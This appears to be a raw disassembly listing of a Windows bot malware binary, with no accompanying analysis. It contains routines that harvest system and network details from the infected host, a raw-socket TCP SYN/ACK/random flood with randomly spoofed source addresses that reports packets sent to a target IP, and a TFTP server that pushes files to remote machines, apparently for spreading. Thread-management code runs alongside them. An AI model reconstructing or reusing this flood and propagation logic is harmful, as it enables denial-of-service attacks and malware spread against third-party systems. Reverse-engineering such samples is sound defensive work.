loc_412B96: ; CODE XREF: sub_412AEE+60�j
; sub_412AEE+6F�j ...
cmp [ebp+70h+var_BC], 2
jnz short loc_412BC5
loc_412B9C: ; CODE XREF: sub_412AEE+51�j
cmp [ebp+70h+var_B8], bl
jz short loc_412BC5
lea eax, [ebp+70h+var_B8]
push eax
push [ebp+70h+var_4]
lea eax, [ebp+70h+var_2E8]
push offset aSS_5 ; "%s (%s)"
push eax
call sub_416905
lea eax, [ebp+70h+var_2E8]
add esp, 10h
mov [ebp+70h+var_4], eax
loc_412BC5: ; CODE XREF: sub_412AEE+44�j
; sub_412AEE+AC�j ...
push 3Fh
pop ecx
xor eax, eax
mov [ebp+70h+var_25C], cx
lea edi, [ebp+70h+var_25A]
rep stosd
stosw
mov eax, dword_43A430
cmp eax, ebx
mov [ebp+70h+var_C], 100h
jz short loc_412BF8
lea ecx, [ebp+70h+var_C]
push ecx
lea ecx, [ebp+70h+var_25C]
push ecx
call eax ; GetUserNameA
loc_412BF8: ; CODE XREF: sub_412AEE+FB�j
push [ebp+70h+arg_4]
call sub_408852
pop ecx
push eax
call dword_43A414 ; inet_addr
push 2
mov [ebp+70h+var_8], eax
push 4
lea eax, [ebp+70h+var_8]
push eax
call dword_43A494 ; gethostbyaddr
cmp eax, ebx
jz short loc_412C21
push dword ptr [eax]
jmp short loc_412C26
; ---------------------------------------------------------------------------
loc_412C21: ; CODE XREF: sub_412AEE+12D�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_412C26: ; CODE XREF: sub_412AEE+131�j
lea eax, [ebp+70h+var_3E4]
push eax
call sub_416905
pop ecx
pop ecx
push 104h
lea eax, [ebp+70h+var_4E8]
push eax
call dword_422048 ; GetSystemDirectoryA
push 46h
lea eax, [ebp+70h+var_114]
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call dword_42209C ; GetDateFormatA
push 46h
lea eax, [ebp+70h+var_15C]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call dword_422098 ; GetTimeFormatA
push 8
pop ecx
xor eax, eax
lea edi, [ebp+70h+var_38]
rep stosd
lea eax, [ebp+70h+var_38]
push eax
call dword_422130 ; GlobalMemoryStatus
push ebx
push ebx
push ebx
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
call sub_41802F
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_7E8]
push eax
call sub_403266
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+70h+var_668]
push ebx
rep movsd
call sub_41296D
add esp, 20h
push eax
lea eax, [ebp+70h+var_15C]
push eax
lea eax, [ebp+70h+var_114]
push eax
lea eax, [ebp+70h+var_25C]
push eax
push [ebp+70h+arg_4]
call sub_408852
pop ecx
push eax
lea eax, [ebp+70h+var_3E4]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
push [ebp+70h+var_C0]
lea eax, [ebp+70h+var_5E8]
push [ebp+70h+var_C4]
push [ebp+70h+var_C8]
push [ebp+70h+var_4]
push eax
lea eax, [ebp+70h+var_568]
push eax
mov eax, [ebp+70h+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_403162
pop ecx
pop ecx
push eax
mov eax, [ebp+70h+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_403162
pop ecx
pop ecx
push eax
call sub_412A38
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+70h+arg_0]
call sub_416B5D
mov eax, [ebp+70h+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
add ebp, 70h
leave
retn
sub_412AEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_412D55 proc near ; CODE XREF: sub_409806+3A65�p
; sub_409806+4F47�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push edi
push 20h
pop ecx
xor eax, eax
cmp dword_43A520, eax
lea edi, [ebp+6Ch+var_8C]
rep stosd
pop edi
jnz short loc_412DBB
push eax
push 80h
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_C]
push eax
call dword_43A4F0 ; InternetGetConnectedStateExA
test eax, eax
jnz short loc_412D9C
lea eax, [ebp+6Ch+var_8C]
push offset dword_42B6F4
push eax
call sub_416905
pop ecx
pop ecx
loc_412D9C: ; CODE XREF: sub_412D55+35�j
test [ebp+6Ch+var_C], 1
lea eax, [ebp+6Ch+var_8]
jz short loc_412DB4
push offset dword_42B6EC
loc_412DAA: ; CODE XREF: sub_412D55+64�j
push eax
call sub_416905
pop ecx
pop ecx
jmp short loc_412DD9
; ---------------------------------------------------------------------------
loc_412DB4: ; CODE XREF: sub_412D55+4E�j
push offset dword_42B6E8
jmp short loc_412DAA
; ---------------------------------------------------------------------------
loc_412DBB: ; CODE XREF: sub_412D55+1D�j
push esi
mov esi, offset off_42B6E4
lea eax, [ebp+6Ch+var_8]
push esi
push eax
call sub_416905
lea eax, [ebp+6Ch+var_8C]
push esi
push eax
call sub_416905
add esp, 10h
pop esi
loc_412DD9: ; CODE XREF: sub_412D55+5D�j
push [ebp+6Ch+arg_4]
push [ebp+6Ch+arg_8]
call sub_408852
pop ecx
push eax
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+6Ch+arg_0]
call sub_416B5D
mov eax, [ebp+6Ch+arg_0]
add esp, 1Ch
add ebp, 6Ch
leave
retn
sub_412D55 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_412E0B proc near ; DATA XREF: sub_409806+5985�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 440h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+74h+var_240]
rep movsd
mov esi, dword_42201C
mov dword ptr [eax+19Ch], 1
push 0Eh
xor eax, eax
xor ebx, ebx
mov [ebp+74h+var_A0], bl
pop ecx
lea edi, [ebp+74h+var_9F]
rep stosd
stosw
stosb
call esi ; GetTickCount
push eax
call sub_41698D
pop ecx
push 0FFh
push 3
push 2
call dword_43A39C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_412E94
call dword_43A45C ; WSAGetLastError
push eax
push offset aTcpErrorSocket ; "[TCP]: Error: socket() failed, returned"...
loc_412E77: ; CODE XREF: sub_412E0B+B1�j
lea eax, [ebp+74h+var_440]
push eax
call sub_416905
add esp, 0Ch
loc_412E86: ; CODE XREF: sub_412E0B+D8�j
; sub_412E0B+3DE�j
cmp [ebp+74h+var_A8], ebx
jnz loc_413199
jmp loc_413179
; ---------------------------------------------------------------------------
loc_412E94: ; CODE XREF: sub_412E0B+5E�j
push 4
lea ecx, [ebp+74h+var_34]
push ecx
push 2
push ebx
push eax
mov [ebp+74h+var_34], 1
call dword_43A3B8 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_412EBE
call dword_43A45C ; WSAGetLastError
push eax
push offset aTcpErrorSetsoc ; "[TCP]: Error: setsockopt() failed, retu"...
jmp short loc_412E77
; ---------------------------------------------------------------------------
loc_412EBE: ; CODE XREF: sub_412E0B+A3�j
lea eax, [ebp+74h+var_23C]
push eax
call dword_43A414 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_412EE5
lea eax, [ebp+74h+var_440]
push offset aTcpInvalidTarg ; "[TCP]: Invalid target IP."
push eax
call sub_416905
pop ecx
pop ecx
jmp short loc_412E86
; ---------------------------------------------------------------------------
loc_412EE5: ; CODE XREF: sub_412E0B+C3�j
xor eax, eax
lea edi, [ebp+74h+var_44]
stosd
stosd
stosd
stosd
push ebx
mov [ebp+74h+var_44], 2
call dword_43A4F4 ; ntohs
mov [ebp+74h+var_42], ax
lea eax, [ebp+74h+var_23C]
push eax
call dword_43A414 ; inet_addr
mov [ebp+74h+var_40], eax
mov [ebp+74h+arg_0], ebx
call esi ; GetTickCount
mov [ebp+74h+var_1C], eax
call esi ; GetTickCount
sub eax, [ebp+74h+var_1C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+74h+var_B4]
ja loc_413131
mov [ebp+74h+var_30], 45h
mov [ebp+74h+var_2C], 1
mov [ebp+74h+var_2A], bx
mov [ebp+74h+var_28], 80h
mov [ebp+74h+var_27], 6
mov [ebp+74h+var_C], 50h
mov [ebp+74h+var_6], bx
loc_412F4C: ; CODE XREF: sub_412E0B+320�j
push 28h
loc_412F4E: ; DATA XREF: .text:off_42B6E4�o
call dword_43A4F4 ; ntohs
cmp [ebp+74h+var_B0], ebx
mov [ebp+74h+var_2E], ax
mov [ebp+74h+var_26], bx
jz short loc_412F88
call sub_41699A
mov esi, eax
shl esi, 8
call sub_41699A
add esi, eax
shl esi, 8
call sub_41699A
add esi, eax
shl esi, 8
call sub_41699A
add esi, eax
jmp short loc_412F9D
; ---------------------------------------------------------------------------
loc_412F88: ; CODE XREF: sub_412E0B+154�j
push [ebp+74h+var_240]
call sub_408852
pop ecx
push eax
call dword_43A414 ; inet_addr
mov esi, eax
loc_412F9D: ; CODE XREF: sub_412E0B+17B�j
cmp [ebp+74h+var_B8], ebx
mov edi, [ebp+74h+var_40]
mov [ebp+74h+var_24], esi
mov [ebp+74h+var_20], edi
jnz short loc_412FBB
call sub_41699A
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_412FBE
; ---------------------------------------------------------------------------
loc_412FBB: ; CODE XREF: sub_412E0B+19E�j
push [ebp+74h+var_B8]
loc_412FBE: ; CODE XREF: sub_412E0B+1AE�j
call dword_43A4F4 ; ntohs
mov [ebp+74h+var_16], ax
call sub_41699A
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_43A4F4 ; ntohs
push 12345678h
mov [ebp+74h+var_18], ax
call dword_43A4CC ; ntohl
mov [ebp+74h+var_14], eax
lea eax, [ebp+74h+var_1BC]
push offset aSyn ; "syn"
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz short loc_41300E
mov [ebp+74h+var_10], ebx
mov [ebp+74h+var_B], 2
jmp short loc_41306A
; ---------------------------------------------------------------------------
loc_41300E: ; CODE XREF: sub_412E0B+1F8�j
lea eax, [ebp+74h+var_1BC]
push offset aAck ; "ack"
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz short loc_41302E
mov [ebp+74h+var_10], ebx
mov [ebp+74h+var_B], 10h
jmp short loc_41306A
; ---------------------------------------------------------------------------
loc_41302E: ; CODE XREF: sub_412E0B+218�j
lea eax, [ebp+74h+var_1BC]
push offset aRandom_0 ; "random"
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz short loc_41306A
call sub_41699A
cdq
push 3
pop ecx
idiv ecx
mov [ebp+74h+var_10], edx
call sub_41699A
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+74h+var_B], dl
loc_41306A: ; CODE XREF: sub_412E0B+201�j
; sub_412E0B+221�j ...
push 200h
call dword_43A4F4 ; ntohs
push 14h
mov [ebp+74h+var_A], ax
mov [ebp+74h+var_8], bx
mov [ebp+74h+var_64], esi
mov [ebp+74h+var_60], edi
mov [ebp+74h+var_5C], bl
mov [ebp+74h+var_5B], 6
call dword_43A4F4 ; ntohs
push 8
pop ecx
mov [ebp+74h+var_5A], ax
push 5
lea esi, [ebp+74h+var_64]
lea edi, [ebp+74h+var_A0]
rep movsd
pop ecx
lea eax, [ebp+74h+var_A0]
push 34h
lea esi, [ebp+74h+var_18]
lea edi, [ebp+74h+var_80]
push eax
rep movsd
call sub_4088A8
push 5
pop ecx
push 5
lea esi, [ebp+74h+var_30]
lea edi, [ebp+74h+var_A0]
rep movsd
mov [ebp+74h+var_8], ax
pop ecx
lea esi, [ebp+74h+var_18]
lea edi, [ebp+74h+var_8C]
rep movsd
xor eax, eax
lea edi, [ebp+74h+var_78]
stosd
lea eax, [ebp+74h+var_A0]
push 28h
push eax
call sub_4088A8
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+74h+var_26], ax
lea eax, [ebp+74h+var_44]
push eax
push ebx
push 3Ch
lea eax, [ebp+74h+var_A0]
push eax
push [ebp+74h+var_4]
lea esi, [ebp+74h+var_30]
lea edi, [ebp+74h+var_A0]
rep movsd
call dword_43A36C ; sendto
cmp eax, 0FFFFFFFFh
jz loc_4131B6
inc [ebp+74h+arg_0]
call dword_42201C ; GetTickCount
sub eax, [ebp+74h+var_1C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+74h+var_B4]
jbe loc_412F4C
loc_413131: ; CODE XREF: sub_412E0B+11D�j
push [ebp+74h+var_4]
call dword_43A4B0 ; closesocket
mov eax, [ebp+74h+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+74h+var_B4]
shr ecx, 14h
push ecx
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_23C]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
lea eax, [ebp+74h+var_440]
push offset aTcpDoneWithSFl ; "[TCP]: Done with %s flood to IP: %s. Se"...
push eax
call sub_416905
add esp, 1Ch
cmp [ebp+74h+var_A8], ebx
jnz short loc_413199
loc_413179: ; CODE XREF: sub_412E0B+84�j
push ebx
push [ebp+74h+var_AC]
lea eax, [ebp+74h+var_440]
push eax
lea eax, [ebp+74h+var_13C]
push eax
push [ebp+74h+var_240]
call sub_405D20
add esp, 14h
loc_413199: ; CODE XREF: sub_412E0B+7E�j
; sub_412E0B+36C�j
lea eax, [ebp+74h+var_440]
push eax
call sub_401ECD
push [ebp+74h+var_BC]
call sub_41397A
pop ecx
pop ecx
push ebx
call dword_422010 ; ExitThread
loc_4131B6: ; CODE XREF: sub_412E0B+302�j
push [ebp+74h+var_4]
call dword_43A4B0 ; closesocket
call dword_43A45C ; WSAGetLastError
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_23C]
push eax
push offset aTcpErrorSendin ; "[TCP]: Error sending packets to IP: %s."...
lea eax, [ebp+74h+var_440]
push 200h
push eax
call sub_416B5D
add esp, 18h
jmp loc_412E86
sub_412E0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4131EE proc near ; CODE XREF: sub_4131EE:loc_4136A7�p
; DATA XREF: sub_401141+104�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 884h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, offset aOctet ; "octet"
lea edi, [ebp+74h+var_1C]
movsd
movsw
xor ebx, ebx
push ebx
xor eax, eax
inc eax
mov esi, edx
push 2
mov ecx, 0A9h
lea edi, [ebp+74h+var_37C]
rep movsd
inc [ebp+74h+var_16C]
push 2
mov [ebp+74h+var_10], eax
mov [edx+2A0h], eax
call dword_43A39C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+74h+var_4], esi
jnz short loc_4132AA
push 190h
call dword_422000 ; Sleep
call dword_43A45C ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpErrorSocke ; "[TFTP]: Error: socket() failed, returne"...
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+74h+var_E0], ebx
jnz short loc_41328D
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_405D20
add esp, 14h
loc_41328D: ; CODE XREF: sub_4131EE+7D�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401ECD
push [ebp+74h+var_170]
call sub_41397A
pop ecx
jmp loc_413693
; ---------------------------------------------------------------------------
loc_4132AA: ; CODE XREF: sub_4131EE+52�j
mov eax, [ebp+74h+var_170]
push [ebp+74h+var_168]
imul eax, 234h
mov dword_43B24C[eax], esi
xor eax, eax
lea edi, [ebp+74h+var_44]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_44], 2
call dword_43A4F4 ; ntohs
mov [ebp+74h+var_42], ax
push 10h
lea eax, [ebp+74h+var_44]
push eax
push esi
mov [ebp+74h+var_40], ebx
call dword_43A47C ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_413309
push 1388h
call dword_422000 ; Sleep
dec [ebp+74h+var_16C]
push [ebp+74h+arg_0]
jmp loc_4136A7
; ---------------------------------------------------------------------------
loc_413309: ; CODE XREF: sub_4131EE+100�j
lea eax, [ebp+74h+var_378]
push offset dword_422998
push eax
call sub_41719C
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+74h+var_8], eax
jnz short loc_413382
push 190h
call dword_422000 ; Sleep
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpFailedToOp ; "[TFTP]: Failed to open file: %s."
push eax
call sub_416905
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_405D20
lea eax, [ebp+74h+var_780]
push eax
call sub_401ECD
push [ebp+74h+var_170]
call sub_41397A
add esp, 28h
jmp loc_413694
; ---------------------------------------------------------------------------
loc_413382: ; CODE XREF: sub_4131EE+133�j
mov esi, 200h
loc_413387: ; CODE XREF: sub_4131EE+471�j
mov edi, [ebp+74h+arg_0]
cmp [edi+2A0h], ebx
jz loc_413668
mov eax, [ebp+74h+var_4]
push 20h
pop ecx
mov [ebp+74h+var_880], eax
xor eax, eax
lea edi, [ebp+74h+var_D8]
rep stosd
lea eax, [ebp+74h+var_34]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_884]
push eax
push ebx
mov [ebp+74h+var_34], 5
mov [ebp+74h+var_30], 1388h
mov [ebp+74h+var_884], 1
call dword_43A448 ; select
test eax, eax
jle loc_41365C
xor eax, eax
mov edx, 80h
mov [ebp+74h+var_580], bl
mov ecx, edx
lea edi, [ebp+74h+var_57F]
rep stosd
stosw
stosb
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push edx
lea eax, [ebp+74h+var_D8]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_C], 10h
call dword_43A328 ; recvfrom
push [ebp+74h+var_28]
mov [ebp+74h+var_10], eax
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_58]
push eax
call sub_416905
cmp [ebp+74h+var_D8], bl
pop ecx
pop ecx
jnz loc_413644
cmp [ebp+74h+var_D7], 1
jnz loc_41359F
lea eax, [ebp+74h+var_274]
lea edx, [eax+1]
loc_413449: ; CODE XREF: sub_4131EE+260�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_413449
sub eax, edx
mov [ebp+74h+var_14], eax
lea eax, [ebp+74h+var_274]
lea edi, [eax+1]
loc_41345E: ; CODE XREF: sub_4131EE+275�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41345E
sub eax, edi
push eax
lea eax, [ebp+74h+var_D6]
push eax
lea eax, [ebp+74h+var_274]
push eax
call sub_418200
add esp, 0Ch
test eax, eax
jnz loc_41355D
lea eax, [ebp+74h+var_1C]
lea edx, [eax+1]
loc_413489: ; CODE XREF: sub_4131EE+2A0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_413489
sub eax, edx
push eax
mov eax, [ebp+74h+var_14]
lea eax, [ebp+eax+74h+var_D5]
push eax
lea eax, [ebp+74h+var_1C]
push eax
call sub_418200
add esp, 0Ch
test eax, eax
jnz loc_41355D
push ebx
push ebx
push [ebp+74h+var_8]
call sub_418577
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
mov [ebp+74h+var_57E], bl
mov [ebp+74h+var_57D], 1
call sub_416F47
add esp, 1Ch
push [ebp+74h+var_C]
lea ecx, [ebp+74h+var_2C]
push ecx
mov [ebp+74h+var_10], eax
push ebx
add eax, 4
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
call dword_43A36C ; sendto
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTransf ; "[TFTP]: File transfer started to IP: %s"...
loc_413517: ; CODE XREF: sub_4131EE+451�j
lea eax, [ebp+74h+var_780]
push eax
call sub_416905
add esp, 10h
cmp [ebp+74h+var_E0], ebx
jnz short loc_41354B
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_405D20
add esp, 14h
loc_41354B: ; CODE XREF: sub_4131EE+33B�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401ECD
pop ecx
jmp loc_41365C
; ---------------------------------------------------------------------------
loc_41355D: ; CODE XREF: sub_4131EE+28F�j
; sub_4131EE+2BB�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 13h
push offset dword_42B884
push [ebp+74h+var_4]
call dword_43A36C ; sendto
lea eax, [ebp+74h+var_274]
push eax
lea eax, [ebp+74h+var_58]
push eax
lea eax, [ebp+74h+var_D8]
push offset aTftpFileNotFou ; "[TFTP]: File not found: %s (%s)."
push eax
call sub_416905
lea eax, [ebp+74h+var_D8]
push eax
call sub_401ECD
add esp, 14h
jmp loc_41365C
; ---------------------------------------------------------------------------
loc_41359F: ; CODE XREF: sub_4131EE+24C�j
cmp [ebp+74h+var_D7], 4
jnz loc_413644
mov cl, [ebp+74h+var_D5]
cmp cl, 0FFh
mov al, [ebp+74h+var_D6]
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
jnz short loc_4135CD
inc al
xor cl, cl
mov [ebp+74h+var_57D], bl
jmp short loc_4135D5
; ---------------------------------------------------------------------------
loc_4135CD: ; CODE XREF: sub_4131EE+3D1�j
inc cl
mov [ebp+74h+var_57D], cl
loc_4135D5: ; CODE XREF: sub_4131EE+3DD�j
mov [ebp+74h+var_57E], al
movzx eax, al
shl eax, 8
movzx ecx, cl
add eax, ecx
shl eax, 9
push ebx
sub eax, esi
push eax
push [ebp+74h+var_8]
call sub_418577
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
call sub_416F47
add esp, 1Ch
push [ebp+74h+var_C]
mov edi, eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
lea eax, [edi+4]
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_10], edi
call dword_43A36C ; sendto
cmp edi, ebx
jnz short loc_41365C
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTran_0 ; "[TFTP]: File transfer complete to IP: %"...
jmp loc_413517
; ---------------------------------------------------------------------------
loc_413644: ; CODE XREF: sub_4131EE+242�j
; sub_4131EE+3B5�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 9
push offset dword_42B824
push [ebp+74h+var_4]
call dword_43A36C ; sendto
loc_41365C: ; CODE XREF: sub_4131EE+1E9�j
; sub_4131EE+36A�j ...
cmp [ebp+74h+var_10], ebx
jg loc_413387
mov edi, [ebp+74h+arg_0]
loc_413668: ; CODE XREF: sub_4131EE+1A2�j
push [ebp+74h+var_4]
call dword_43A4B0 ; closesocket
push [ebp+74h+var_8]
call sub_416E0D
dec [ebp+74h+var_16C]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_41369B
push [ebp+74h+var_170]
call sub_41397A
loc_413693: ; CODE XREF: sub_4131EE+B7�j
pop ecx
loc_413694: ; CODE XREF: sub_4131EE+18F�j
push ebx
call dword_422010 ; ExitThread
loc_41369B: ; CODE XREF: sub_4131EE+498�j
push 3E8h
call dword_422000 ; Sleep
push edi
loc_4136A7: ; CODE XREF: sub_4131EE+116�j
call sub_4131EE
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn 4
sub_4131EE endp
; =============== S U B R O U T I N E =======================================
sub_4136B6 proc near ; CODE XREF: sub_401141+ED�p
; sub_401141+229�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_43B040
loc_4136BE: ; CODE XREF: sub_4136B6+18�j
cmp byte ptr [eax], 0
jz short loc_4136D2
add eax, 234h
inc edi
cmp eax, offset dword_47FDD0
jl short loc_4136BE
jmp short loc_41371D
; ---------------------------------------------------------------------------
loc_4136D2: ; CODE XREF: sub_4136B6+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_43B040[esi]
push eax
call sub_4169C0
mov eax, [esp+14h+arg_4]
and dword_43B244[esi], 0
and dword_43B248[esi], 0
mov dword_43B240[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and byte_43B258[esi], 0
mov dword_43B24C[esi], eax
pop esi
loc_41371D: ; CODE XREF: sub_4136B6+1A�j
mov eax, edi
pop edi
retn
sub_4136B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413721 proc near ; CODE XREF: sub_4139B7+31�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
xor edi, edi
mov esi, offset dword_43B040
loc_41374B: ; CODE XREF: sub_413721+78�j
cmp byte ptr [esi], 0
jz short loc_41378C
cmp [ebp+arg_C], 0
jnz short loc_41375F
cmp dword ptr [esi+204h], 0
jnz short loc_41378C
loc_41375F: ; CODE XREF: sub_413721+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_416905
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 24h
loc_41378C: ; CODE XREF: sub_413721+2D�j
; sub_413721+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_47FDD0
jl short loc_41374B
pop edi
pop esi
leave
retn
sub_413721 endp
; =============== S U B R O U T I N E =======================================
sub_41379F proc near ; CODE XREF: sub_409806+42A1�p
; sub_413827+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_413821
cmp esi, 1F4h
jge short loc_413821
imul esi, 234h
push edi
push ebx
lea edi, dword_43B254[esi]
push dword ptr [edi]
call dword_4220F0 ; TerminateThread
cmp [edi], ebx
jz short loc_4137D1
inc ebp
loc_4137D1: ; CODE XREF: sub_41379F+2F�j
mov [edi], ebx
lea edi, dword_43B248[esi]
mov eax, [edi]
cmp eax, ebx
